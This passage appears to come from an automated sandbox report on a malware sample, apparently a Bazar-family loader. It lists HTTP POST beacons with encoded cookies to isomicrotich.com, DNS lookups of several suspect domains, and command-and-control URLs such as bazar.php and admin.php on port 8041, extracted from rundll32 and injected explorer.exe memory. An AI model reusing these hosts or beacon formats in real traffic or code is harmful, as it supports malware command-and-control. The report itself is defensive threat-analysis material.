                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk5OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk6+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFk6uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4eSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn4OSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5+SA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: global trafficHTTP traffic detected: POST /test/ HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedCookie: kALB+jBIcqFn5uSA23BDnqv6we+M3zViQFpD1OId4IUdx53bQgAuqDzvJX9ORdeqD86sP3WjXmEACA0yZ/O3ODJ7/XMG/VYf3/u7Y9DoQ8yZb55yE2gyQrMEAlRDTc57VGlGosc78XJyLzwrbQw+3EicyUNn455nyUUlxu1OEEdhqNYb/p4vqdcGUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)Host: isomicrotich.comContent-Length: 0Cache-Control: no-cache
                  Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\explorer.exe Code function: 9_2_00F25078 InternetReadFile,9_2_00F25078
                  Source: global traffic DNS traffic detected: DNS query: tiguanin.com
                  Source: global traffic DNS traffic detected: DNS query: bazarunet.com
                  Source: global traffic DNS traffic detected: DNS query: greshunka.com
                  Source: global traffic DNS traffic detected: DNS query: isomicrotich.com
                  Source: unknown HTTP traffic detected: POST /test/ HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded Cookie: kALB+jBIcqFh9baN0mUbkry70/OBhj4SPyJDpuAd5YZutJOgRAJdrjzrUX44N6GpDsu9dmntVXFHGxw5Mv+gazRt6m8J8V5HhO+mYsr4QtqBIt9nDnI3D7sEB1NNQMN7SzlVtYg37mRsfDlmYQ4rnkWH3kVw/phmmhE/2u9KGlZ8s8sR9dhipdU= User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1) Host: isomicrotich.com Content-Length: 92 Cache-Control: no-cache
                  Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com/
                  Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/%
                  Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/:
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/C%m
                  Source: rundll32.exe, 00000006.00000003.1615547549.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/K%e
                  Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/P
                  Source: rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/W%
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/Y
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.php;
                  Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.php=
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpC
                  Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpCryptography
                  Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpI
                  Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpX
                  Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpn
                  Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpow
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/admin.phpwindowsupdate.comj
                  Source: rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php.
                  Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.php4
                  Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpC
                  Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpMM
                  Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpQ
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpR
                  Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpT
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpX
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpl.mui
                  Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phpm:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/bazar.phps
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/in.com:8041/
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/net.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/s%
                  Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/u
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bazarunet.com:8041/zar.php
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                  Source: rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/
                  Source: rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com/S%
                  Source: rundll32.exe, 00000006.00000003.2241985447.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/
                  Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2241985447.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.php4
                  Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpV
                  Source: rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/admin.phpx
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3318968115.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php
                  Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php%
                  Source: rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php.
                  Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.php6
                  Source: rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpe
                  Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://greshunka.com:8041/bazar.phpu
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
                  Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                  Source: explorer.exe, 00000009.00000003.3074047960.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C596000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/
                  Source: explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/.7
                  Source: explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/1n8J
                  Source: explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/3
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/5117-2476756634-1003
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/5117-2476756634-1003J&
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/N
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/SIE
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/T
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/r
                  Source: explorer.exe, 00000009.00000003.3074047960.000000000913F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/r5
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/2476756634-1003
                  Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/2476756634-1003j
                  Source: explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/7
                  Source: explorer.exe, 00000009.00000002.3811134225.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/E
                  Source: explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/MenuArray_151436-
                  Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://isomicrotich.com/test/O
